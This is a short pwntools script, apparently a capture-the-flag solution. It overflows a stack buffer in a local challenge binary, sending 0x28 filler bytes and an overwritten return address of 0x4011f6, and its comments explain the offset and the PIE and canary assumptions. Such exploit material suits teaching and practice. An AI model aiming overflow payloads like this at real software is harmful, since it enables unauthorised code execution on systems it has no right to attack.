#!/usr/bin/python3
"""pwntools driver for the local challenge binary ``./pwn``.

Launches the target (locally, under gdb, or over TCP depending on the
command-line switches), sends one fixed payload line, then hands the
session over to the operator.
"""
from pwn import *

# Target binary, libc image to load alongside it, and the TCP endpoint
# used when the REMOTE switch is given.
filename = "./pwn"
libcname = "/lib/x86_64-linux-gnu/libc.so.6"
host = 'localhost'
port = 7777

# Loading the ELF into context.binary lets pwntools take architecture and
# word size from the target itself.
elf = ELF(filename)
context.binary = elf
context.terminal = ['tmux', 'neww']

# libc is only parsed when a path is configured; nothing below reads it.
if libcname:
    libc = ELF(libcname)

# Commands handed to gdb when the GDB switch is used: break at main.
gs = ''' b main '''


def start():
    """Return a tube connected to the target.

    GDB on the command line starts the binary under gdb with ``gs`` as
    the script, REMOTE connects to ``host:port``, and with neither switch
    the binary is spawned as a plain local process.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript = gs)
    if args.REMOTE:
        return remote(host, port)
    return process(elf.path)


p = start()

# 0x28 filler bytes followed by one packed 64-bit value.
# NOTE(review): presumably the filler spans the stack buffer plus the saved
# frame pointer, so the packed value lands on the saved return address;
# confirm the offset against the binary.
# NOTE(review): a hard-coded absolute address only holds if the target is
# built without PIE, and a fixed-offset overwrite like this assumes no stack
# canary; enabling either mitigation in the build should break the payload.
padding = b'a' * 0x28
target = p64(0x4011f6)
p.sendline(padding + target)

p.interactive()